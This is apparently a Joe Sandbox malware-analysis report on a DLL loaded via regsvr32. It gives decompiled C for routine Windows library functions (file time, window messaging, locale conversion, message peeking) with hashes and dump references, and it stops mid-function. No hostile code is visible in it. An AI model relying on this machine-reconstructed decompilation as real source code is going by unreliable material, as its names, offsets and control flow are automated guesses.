Associated: 00000002.00000002.259750364.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259817552.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259866776.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259911607.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259942125.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259964401.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.260018017.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Window$Rect$DesktopVisible
String ID:
API String ID: 1055025324-0
Opcode ID: ef76f55fcefd2cae7d74b9455366248ca8dbe27d5b7ca6cb76258884cb09bc7f
Instruction ID: 8de48d2105652726057613f2335e895d96fc1fae9d5598094c6c5e62d9502a62
Opcode Fuzzy Hash: ef76f55fcefd2cae7d74b9455366248ca8dbe27d5b7ca6cb76258884cb09bc7f
Instruction Fuzzy Hash: F751F975A0010AAFDB04DFA8CD84CAEB7B9FF49344B114468F605EB265DB30EE41CB60

Uniqueness

Uniqueness Score: -1.00%

Function 1001C6EB Relevance: 6.1, APIs: 4, Instructions: 132
timeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E1001C6EB(void* __ecx, void* __eflags, signed int* _a4) {
				char _v12;
				struct _FILETIME _v20;
				struct _FILETIME _v28;
				char _v36;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t52;
				long _t56;
				signed int* _t75;
				signed int* _t78;
				signed int* _t81;
				struct _FILETIME* _t88;
				void* _t100;
				CHAR* _t101;
				signed int* _t102;
				void* _t103;
				void* _t107;

				_t85 = __ecx;
				_t102 = _a4;
				_t100 = __ecx;
				E10020F40(__ecx, _t102, 0, 0x128);
				E10004EB7(0, _t85, _t100, _t102, _t103,  &(_t102[8]), 0x104,  *(_t100 + 0xc), 0xffffffff);
				_t52 =  *(_t100 + 4);
				_t107 = _t52 -  *0x100384f0; // 0xffffffff
				if(_t107 == 0) {
					L21:
					return 1;
				}
				_t88 =  &_v12;
				if(GetFileTime(_t52, _t88,  &_v20,  &_v28) != 0) {
					_t56 = GetFileSize( *(_t100 + 4), 0);
					_t102[6] = _t56;
					_t102[7] = 0;
					if(_t56 != 0xffffffff || 0 != 0) {
						_t101 =  *(_t100 + 0xc);
						if( *((intOrPtr*)(_t101 - 0xc)) != 0) {
							_t102[8] = (_t88 & 0xffffff00 | GetFileAttributesA(_t101) == 0xffffffff) - 0x00000001 & _t57;
						} else {
							_t102[8] = 0;
						}
						if(E1001C573( &_v12) == 0) {
							 *_t102 = 0;
							_t102[1] = 0;
						} else {
							_t81 = E1001C68D( &_v36,  &_v12, 0xffffffff);
							 *_t102 =  *_t81;
							_t102[1] = _t81[1];
						}
						if(E1001C573( &_v20) == 0) {
							_t102[4] = 0;
							_t102[5] = 0;
						} else {
							_t78 = E1001C68D( &_v36,  &_v20, 0xffffffff);
							_t102[4] =  *_t78;
							_t102[5] = _t78[1];
						}
						if(E1001C573( &_v28) == 0) {
							_t102[2] = 0;
							_t102[3] = 0;
						} else {
							_t75 = E1001C68D( &_v36,  &_v28, 0xffffffff);
							_t102[2] =  *_t75;
							_t102[3] = _t75[1];
						}
						if(( *_t102 | _t102[1]) == 0) {
							 *_t102 = _t102[2];
							_t102[1] = _t102[3];
						}
						if((_t102[4] | _t102[5]) == 0) {
							_t102[4] = _t102[2];
							_t102[5] = _t102[3];
						}
						goto L21;
					} else {
						goto L2;
					}
				}
				L2:
				return 0;
			}

APIs

_memset.LIBCMT ref: 1001C702

Part of subcall function 10004EB7: _wctomb_s.LIBCMT ref: 10004EC7

GetFileTime.KERNEL32(?,?,?,?), ref: 1001C739
GetFileSize.KERNEL32(?,00000000), ref: 1001C74E

Memory Dump Source

Source File: 00000002.00000002.259635846.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.259568974.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259703759.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259750364.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259817552.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259866776.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259911607.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259942125.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259964401.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.260018017.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: File$SizeTime_memset_wctomb_s
String ID:
API String ID: 26245289-0
Opcode ID: 849433f6196f86cb5afcb6a6d1b4fa8c1ab3bc4dc122d4181a5b04c53ba76e7d
Instruction ID: 51a8328b60633bd59e5f15858ada0f86eee49ce44263773015f9aa20d2328a8a
Opcode Fuzzy Hash: 849433f6196f86cb5afcb6a6d1b4fa8c1ab3bc4dc122d4181a5b04c53ba76e7d
Instruction Fuzzy Hash: 0B410C759047099FC724CF68C881C9AB7F8FF087607118A2DE5A6DB691E770F984CB64

Uniqueness

Uniqueness Score: -1.00%

Function 1000F366 Relevance: 6.1, APIs: 4, Instructions: 103
windowCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E1000F366(void* __ecx, struct HWND__** _a4) {
				struct HWND__** _v8;
				struct HWND__** _v12;
				long _t31;
				struct HWND__** _t32;
				struct HWND__** _t44;
				struct HWND__** _t45;
				long _t47;
				void* _t49;
				struct HWND__** _t63;

				_push(__ecx);
				_push(__ecx);
				_t49 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x4c)) != 0) {
					_t31 = _a4;
					if(_t31 != 0) {
						if( *((intOrPtr*)(_t31 + 8)) == 0) {
							L4:
							_t32 = E1001B8D6( *((intOrPtr*)(_t49 + 0x4c)) + 0x40, _t31, 0);
							_v12 = _t32;
							_a4 = _t32;
							E1000911A( &_a4);
							while(_a4 != 0) {
								_t37 =  *((intOrPtr*)(E1000911A( &_a4)));
								_v8 =  *((intOrPtr*)(E1000911A( &_a4)));
								if((E1000F07E(_t37) & 0x00020000) != 0) {
									break;
								} else {
									_t45 = _v8;
									if(_t45[2] == 0 || SendMessageA( *_t45, 0xf0, 0, 0) != 1) {
										continue;
									} else {
										L16:
										_t44 = _v8;
										goto L17;
									}
								}
								goto L18;
							}
							_a4 = _v12;
							_t31 = E1000F16D( &_a4);
							while(_a4 != 0) {
								_t63 =  *(E1000F16D( &_a4));
								_v8 = _t63;
								if(_t63[2] == 0) {
									L13:
									_t31 = E1000F07E(_t63);
									if((_t31 & 0x00020000) == 0) {
										continue;
									}
								} else {
									if(SendMessageA( *_t63, 0xf0, 0, 0) == 1) {
										goto L16;
									} else {
										_t63 = _v8;
										goto L13;
									}
								}
								goto L18;
							}
						} else {
							_t47 = SendMessageA( *_t31, 0xf0, 0, 0);
							_t44 = _a4;
							if(_t47 == 1) {
								L17:
								_t31 = SendMessageA( *_t44, 0xf1, 0, 0);
							} else {
								goto L4;
							}
						}
						L18:
					}
				}
				return _t31;
			}

APIs

SendMessageA.USER32 ref: 1000F39A
SendMessageA.USER32 ref: 1000F3FF
SendMessageA.USER32 ref: 1000F444
SendMessageA.USER32 ref: 1000F46D

Memory Dump Source

Source File: 00000002.00000002.259635846.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.259568974.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259703759.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259750364.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259817552.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259866776.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259911607.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259942125.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259964401.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.260018017.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 6d35c6499f517dbc8d4cda50e386da3e84cd8cfccc05535bafaf18b93e278df5
Instruction ID: f3d15569573835c18d81f199704cf95a6a2abc57fcee4060fc3bf4c3a8b62e7d
Opcode Fuzzy Hash: 6d35c6499f517dbc8d4cda50e386da3e84cd8cfccc05535bafaf18b93e278df5
Instruction Fuzzy Hash: A9317E30501219FFEB15DF51C881EAF3BA9EF417D0F10806AF9059B619DA70AD80EB91

Uniqueness

Uniqueness Score: -1.00%

Function 1002DB82 Relevance: 6.1, APIs: 4, Instructions: 101
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E1002DB82(void* __edi, short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				signed int _v12;
				char _v20;
				char _t43;
				char _t46;
				signed int _t53;
				signed int _t54;
				intOrPtr _t56;
				intOrPtr _t57;
				int _t58;
				signed short* _t59;
				short* _t60;
				int _t65;
				char* _t72;

				_t72 = _a8;
				if(_t72 == 0 || _a12 == 0) {
					L5:
					return 0;
				} else {
					if( *_t72 != 0) {
						E1002276D( &_v20, __edi, _a16);
						_t43 = _v20;
						__eflags =  *(_t43 + 0x14);
						if( *(_t43 + 0x14) != 0) {
							_t46 = E1002D2BC( *_t72 & 0x000000ff,  &_v20);
							__eflags = _t46;
							if(_t46 == 0) {
								__eflags = _a4;
								_t40 = _v20 + 4; // 0x840ffff8
								__eflags = MultiByteToWideChar( *_t40, 9, _t72, 1, _a4, 0 | _a4 != 0x00000000);
								if(__eflags != 0) {
									L10:
									__eflags = _v8;
									if(_v8 != 0) {
										_t53 = _v12;
										_t11 = _t53 + 0x70;
										 *_t11 =  *(_t53 + 0x70) & 0xfffffffd;
										__eflags =  *_t11;
									}
									return 1;
								}
								L21:
								_t54 = E10020B71(__eflags);
								 *_t54 = 0x2a;
								__eflags = _v8;
								if(_v8 != 0) {
									_t54 = _v12;
									_t33 = _t54 + 0x70;
									 *_t33 =  *(_t54 + 0x70) & 0xfffffffd;
									__eflags =  *_t33;
								}
								return _t54 | 0xffffffff;
							}
							_t56 = _v20;
							_t15 = _t56 + 0xac; // 0xa045ff98
							_t65 =  *_t15;
							__eflags = _t65 - 1;
							if(_t65 <= 1) {
								L17:
								_t24 = _t56 + 0xac; // 0xa045ff98
								__eflags = _a12 -  *_t24;
								if(__eflags < 0) {
									goto L21;
								}
								__eflags = _t72[1];
								if(__eflags == 0) {
									goto L21;
								}
								L19:
								__eflags = _v8;
								_t27 = _t56 + 0xac; // 0xa045ff98
								_t57 =  *_t27;
								if(_v8 == 0) {
									return _t57;
								}
								 *((intOrPtr*)(_v12 + 0x70)) =  *(_v12 + 0x70) & 0xfffffffd;
								return _t57;
							}
							__eflags = _a12 - _t65;
							if(_a12 < _t65) {
								goto L17;
							}
							__eflags = _a4;
							_t21 = _t56 + 4; // 0x840ffff8
							_t58 = MultiByteToWideChar( *_t21, 9, _t72, _t65, _a4, 0 | _a4 != 0x00000000);
							__eflags = _t58;
							_t56 = _v20;
							if(_t58 != 0) {
								goto L19;
							}
							goto L17;
						}
						_t59 = _a4;
						__eflags = _t59;
						if(_t59 != 0) {
							 *_t59 =  *_t72 & 0x000000ff;
						}
						goto L10;
					} else {
						_t60 = _a4;
						if(_t60 != 0) {
							 *_t60 = 0;
						}
						goto L5;
					}
				}
			}

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 1002DBB2
__isleadbyte_l.LIBCMT ref: 1002DBE6
MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,A045FF98,?,00000000,00000001,?,00000001,1002D65D,?,?,00000002), ref: 1002DC17
MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,00000001,?,00000000,00000001,?,00000001,1002D65D,?,?,00000002), ref: 1002DC85

Memory Dump Source

Source File: 00000002.00000002.259635846.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.259568974.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259703759.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259750364.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259817552.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259866776.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259911607.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259942125.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259964401.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.260018017.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 3e2ec8070e78dc2584ef5f67e7d258c507cb05aa85bef0efbd0a2838ee37334f
Instruction ID: 37aa916cde1404fb766b6052f6d7e43a4bf17a9cf34586f159c1b1eafb0ae636
Opcode Fuzzy Hash: 3e2ec8070e78dc2584ef5f67e7d258c507cb05aa85bef0efbd0a2838ee37334f
Instruction Fuzzy Hash: 9131F231A0028AEFDB12EF64DC90AAE7BE5FF00351FA285AAE4608B191D370DD40DB50

Uniqueness

Uniqueness Score: -1.00%

Function 10016C75 Relevance: 6.1, APIs: 4, Instructions: 91
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E10016C75(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t51;
				void* _t53;
				intOrPtr _t68;
				intOrPtr _t69;
				intOrPtr _t70;
				intOrPtr* _t77;
				signed int _t80;
				void* _t82;
				void* _t83;
				intOrPtr* _t84;

				_t83 = __eflags;
				_push(0x20);
				E1001FBC4(E10034195, __ebx, __edi, __esi);
				_t80 = 0;
				 *((intOrPtr*)(_t82 - 0x10)) = 0;
				 *((intOrPtr*)(_t82 - 0x14)) = 0x10038988;
				_t68 =  *((intOrPtr*)(_t82 + 8));
				_t71 = _t82 - 0x1c;
				 *(_t82 - 4) = 0;
				E1000EC55(_t82 - 0x1c, _t83,  *((intOrPtr*)(_t68 - 0xb0)));
				_t77 =  *((intOrPtr*)(_t82 + 0x14));
				_t84 = _t77;
				 *(_t82 - 4) = 1;
				_t85 = _t84 == 0;
				if(_t84 == 0) {
					E10004E6E(_t68, _t71, _t77, 0, _t85);
				}
				 *_t77 = _t80;
				if( *((intOrPtr*)(_t68 - 8)) == _t80) {
					_push(GetDC( *( *((intOrPtr*)( *((intOrPtr*)(_t68 - 0xac)) + 0x20)) + 0x20)));
					_t51 = E1000FFD3(_t68, _t71, _t77, _t80, __eflags);
					__eflags = _t51 - _t80;
					 *((intOrPtr*)(_t68 - 8)) = _t51;
					if(_t51 == _t80) {
						goto L3;
					} else {
						__eflags =  *(_t82 + 0xc) - _t80;
						if( *(_t82 + 0xc) != _t80) {
							IntersectRect(_t82 - 0x2c, _t68 - 0x9c,  *(_t82 + 0xc));
						} else {
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
							_t77 =  *((intOrPtr*)(_t82 + 0x14));
							_t80 = 0;
						}
						E10010292(_t82 - 0x14, _t77, _t82, CreateRectRgnIndirect(_t82 - 0x2c));
						E1000FD9F( *((intOrPtr*)(_t68 - 8)), _t82 - 0x14, 1);
						_t69 =  *((intOrPtr*)(_t68 - 8));
						__eflags = _t69 - _t80;
						if(_t69 != _t80) {
							_t70 =  *((intOrPtr*)(_t69 + 4));
						} else {
							_t70 = 0;
						}
						__eflags =  *((intOrPtr*)(_t82 - 0x18)) - _t80;
						 *_t77 = _t70;
						 *(_t82 - 4) = 0;
						if( *((intOrPtr*)(_t82 - 0x18)) != _t80) {
							_push( *((intOrPtr*)(_t82 - 0x1c)));
							_push(_t80);
							E1000E519();
						}
						 *(_t82 - 4) =  *(_t82 - 4) | 0xffffffff;
						 *((intOrPtr*)(_t82 - 0x14)) = 0x10038068;
						E100102E5(_t82 - 0x14);
						_t53 = 0;
						__eflags = 0;
					}
				} else {
					L3:
					 *(_t82 - 4) = 0;
					if( *((intOrPtr*)(_t82 - 0x18)) != _t80) {
						_push( *((intOrPtr*)(_t82 - 0x1c)));
						_push(_t80);
						E1000E519();
					}
					 *(_t82 - 4) =  *(_t82 - 4) | 0xffffffff;
					 *((intOrPtr*)(_t82 - 0x14)) = 0x10038068;
					E100102E5(_t82 - 0x14);
					_t53 = 0x80004005;
				}
				return E1001FC9C(_t53);
			}

APIs

__EH_prolog3.LIBCMT ref: 10016C7C

Part of subcall function 10004E6E: __CxxThrowException@8.LIBCMT ref: 10004E82
Part of subcall function 10004E6E: __EH_prolog3.LIBCMT ref: 10004E8F

GetDC.USER32(?), ref: 10016CFA
IntersectRect.USER32 ref: 10016D34
CreateRectRgnIndirect.GDI32(?), ref: 10016D3E

Memory Dump Source

Source File: 00000002.00000002.259635846.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.259568974.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259703759.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259750364.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259817552.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259866776.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259911607.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259942125.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259964401.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.260018017.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: H_prolog3Rect$CreateException@8IndirectIntersectThrow
String ID:
API String ID: 2872313494-0
Opcode ID: 66e4162995eff29e74f150a019b0503a6bfab80782a46ba9d83f80b8aff9d0d3
Instruction ID: aba366ee442878ba1e0e253a8bcb53805126a2189cb4a44b534bc72d57d8081b
Opcode Fuzzy Hash: 66e4162995eff29e74f150a019b0503a6bfab80782a46ba9d83f80b8aff9d0d3
Instruction Fuzzy Hash: 45316A75D0026ADFDF02CFA4CD85AAEBBB5FF08340F118096E541AF141D775AA81CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 10011620 Relevance: 6.1, APIs: 4, Instructions: 88
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E10011620(void* __ecx, void* __edx, void* __edi, void* __eflags, signed int _a4) {
				void* __ebx;
				void* __esi;
				void* __ebp;
				intOrPtr _t29;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t36;
				intOrPtr _t37;
				signed int _t39;
				void* _t47;
				intOrPtr* _t48;
				void* _t50;
				void* _t51;
				void* _t64;
				void* _t65;
				intOrPtr _t66;
				void* _t68;
				void* _t70;

				_t65 = __edi;
				_t64 = __edx;
				_t51 = E1000EC3C(_t50, __ecx, __edi, _t68, __eflags);
				_t29 =  *((intOrPtr*)(_t51 + 0x10));
				if(_t29 == 0) {
					L19:
					return 0 |  *((intOrPtr*)(_t51 + 0x10)) != 0x00000000;
				}
				_t32 = _t29 - 1;
				 *((intOrPtr*)(_t51 + 0x10)) = _t32;
				if(_t32 != 0) {
					goto L19;
				}
				if(_a4 == 0) {
					L8:
					_push(_t65);
					_t66 =  *((intOrPtr*)(E1000EC09(_t51, _t65, 0, _t77) + 4));
					_t70 = E1001063D(0x10048490);
					if(_t70 == 0 || _t66 == 0) {
						L18:
						goto L19;
					} else {
						_t35 =  *((intOrPtr*)(_t70 + 0xc));
						_t80 = _t35;
						if(_t35 == 0) {
							L12:
							if( *((intOrPtr*)(_t66 + 0x98)) != 0) {
								_t36 =  *((intOrPtr*)(_t70 + 0xc));
								_a4 = _a4 & 0x00000000;
								_t83 = _t36;
								if(_t36 != 0) {
									_push(_t36);
									_t39 = E10022FC3(_t51, _t64, _t66, _t70, _t83);
									_push( *((intOrPtr*)(_t70 + 0xc)));
									_a4 = _t39;
									E1001F6F4(_t51, _t66, _t70, _t83);
								}
								_t37 = E1001F631(_t51, _t64, _t66, _t70,  *((intOrPtr*)(_t66 + 0x98)));
								 *((intOrPtr*)(_t70 + 0xc)) = _t37;
								if(_t37 == 0 && _a4 != _t37) {
									 *((intOrPtr*)(_t70 + 0xc)) = E1001F631(_t51, _t64, _t66, _t70, _a4);
								}
							}
							goto L18;
						}
						_push(_t35);
						if(E10022FC3(_t51, _t64, _t66, _t70, _t80) >=  *((intOrPtr*)(_t66 + 0x98))) {
							goto L18;
						}
						goto L12;
					}
				}
				if(_a4 != 0xffffffff) {
					_t47 = E100069D9();
					if(_t47 != 0) {
						_t48 =  *((intOrPtr*)(_t47 + 0x3c));
						_t77 = _t48;
						if(_t48 != 0) {
							 *_t48(0, 0);
						}
					}
				}
				E10011554( *((intOrPtr*)(_t51 + 0x20)), _t65);
				E10011554( *((intOrPtr*)(_t51 + 0x1c)), _t65);
				E10011554( *((intOrPtr*)(_t51 + 0x18)), _t65);
				E10011554( *((intOrPtr*)(_t51 + 0x14)), _t65);
				E10011554( *((intOrPtr*)(_t51 + 0x24)), _t65);
				goto L8;
			}

APIs

__msize.LIBCMT ref: 100116B1
__msize.LIBCMT ref: 100116D4
_malloc.LIBCMT ref: 100116EC
_malloc.LIBCMT ref: 10011701

Memory Dump Source

Source File: 00000002.00000002.259635846.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.259568974.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259703759.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259750364.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259817552.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259866776.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259911607.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259942125.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259964401.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.260018017.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: __msize_malloc
String ID:
API String ID: 1288803200-0
Opcode ID: d1915d63eea8e9ac060601f89bbf342bf1150ebf247c7c28b44440d4c4ba0e4f
Instruction ID: f1eca33ff59634d1dad84df821d0f84545a75b9cee29ec0de7196f6c68877e4a
Opcode Fuzzy Hash: d1915d63eea8e9ac060601f89bbf342bf1150ebf247c7c28b44440d4c4ba0e4f
Instruction Fuzzy Hash: F1218F346047019BDB58EF74D881ADA77F6EF45291B11852AF8198F296DB30ECD1CB90

Uniqueness

Uniqueness Score: -1.00%

Function 1001EB9E Relevance: 6.1, APIs: 4, Instructions: 85
windowCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E1001EB9E(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				int _t34;
				intOrPtr* _t62;
				void* _t63;
				void* _t64;

				_t64 = __eflags;
				_push(0x24);
				E1001FBC4(E10034B90, __ebx, __edi, __esi);
				_t62 =  *((intOrPtr*)(_t63 + 8)) + 0xffffffc0;
				E1000EC55(_t63 - 0x14, _t64,  *((intOrPtr*)( *((intOrPtr*)(_t63 + 8)) - 0x24)));
				 *(_t63 - 4) = 0;
				if( *((intOrPtr*)(_t63 + 0x10)) <=  *((intOrPtr*)(_t62 + 0x3c))) {
					L8:
					__eflags =  *(_t62 + 0x30);
					if( *(_t62 + 0x30) == 0) {
						_t34 = PeekMessageA(_t63 - 0x30, 0, 0, 0, 2);
						__eflags = _t34;
						if(_t34 != 0) {
							 *((intOrPtr*)( *_t62 + 0x58))(_t63 - 0x30);
						}
						L14:
						 *(_t63 - 4) =  *(_t63 - 4) | 0xffffffff;
						if( *(_t63 - 0x10) != 0) {
							_push( *((intOrPtr*)(_t63 - 0x14)));
							_push(0);
							E1000E519();
						}
						L17:
						return E1001FC9C(1);
					}
					L9:
					 *(_t63 - 4) =  *(_t63 - 4) | 0xffffffff;
					__eflags =  *(_t63 - 0x10);
					if( *(_t63 - 0x10) != 0) {
						_push( *((intOrPtr*)(_t63 - 0x14)));
						_push(0);
						E1000E519();
					}
					_push(2);
					_pop(1);
					goto L17;
				}
				if( *(_t62 + 0x30) != 0) {
					goto L9;
				}
				_push(_t63 - 0x30);
				if( *((intOrPtr*)( *_t62 + 0x5c))() == 0 ||  *((intOrPtr*)(_t62 + 0x2c)) == 0) {
					goto L8;
				} else {
					 *(_t62 + 0x30) = 1;
					do {
					} while (PeekMessageA(_t63 - 0x30, 0, 0x200, 0x209, 3) != 0);
					do {
					} while (PeekMessageA(_t63 - 0x30, 0, 0x100, 0x109, 3) != 0);
					 *((intOrPtr*)( *_t62 + 0x64))( *((intOrPtr*)(_t63 + 0xc)));
					 *(_t62 + 0x30) = 0;
					goto L14;
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 1001EBA5
PeekMessageA.USER32 ref: 1001EBFF
PeekMessageA.USER32 ref: 1001EC16
PeekMessageA.USER32 ref: 1001EC50

Memory Dump Source

Source File: 00000002.00000002.259635846.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.259568974.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259703759.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259750364.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259817552.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259866776.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259911607.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259942125.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259964401.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.260018017.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: MessagePeek$H_prolog3
String ID:
API String ID: 3998274959-0
Opcode ID: 8e92611c31d2cd69e42728f5b9538133524b27f68ed2c44099a2059452102d37
Instruction ID: 7a5ad787edd883707f1bdef7fe17baf98f592d1ae8ded73e135a3cc4ce0c4401
Opcode Fuzzy Hash: 8e92611c31d2cd69e42728f5b9538133524b27f68ed2c44099a2059452102d37
Instruction Fuzzy Hash: 98314B75A0068AEFDB20DFA4CD95EAE73E8FF04744F110919F652AA181D770EE818B50

Uniqueness

Uniqueness Score: -1.00%

Function 1001338A Relevance: 6.1, APIs: 4, Instructions: 73
COMMON

Download Yara Rule

C-Code - Quality: 20%

			E1001338A(intOrPtr __ebx, intOrPtr* __ecx, intOrPtr __esi, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
				signed int _v8;
				signed char _v264;
				void* __edi;
				signed int _t11;
				signed int _t14;
				void* _t16;
				char _t19;
				signed int _t22;
				intOrPtr _t23;
				signed int* _t34;
				CHAR* _t36;
				signed int _t37;

				_t35 = __esi;
				_t26 = __ebx;
				_t11 =  *0x10045580; // 0x771f5646
				_v8 = _t11 ^ _t37;
				_t34 = _a8;
				_push(0x100);
				_t33 =  &_v264;
				_push( &_v264);
				_push(_a4);
				_t14 =  *((intOrPtr*)( *__ecx + 0x7c))();
				if(_t14 != 0) {
					_push(__ebx);
					_push(__esi);
					_t36 =  &_v264;
					_t16 = E100235A2(_v264 & 0x000000ff);
					while(_t16 != 0) {
						_t36 = CharNextA(_t36);
						_t16 = E100235A2( *_t36 & 0x000000ff);
					}
					_t19 =  *_t36;
					if(_t19 == 0x2b || _t19 == 0x2d) {
						_t36 = CharNextA(_t36);
					}
					_t22 = E100234D2( *_t36 & 0x000000ff);
					_pop(_t35);
					_pop(_t26);
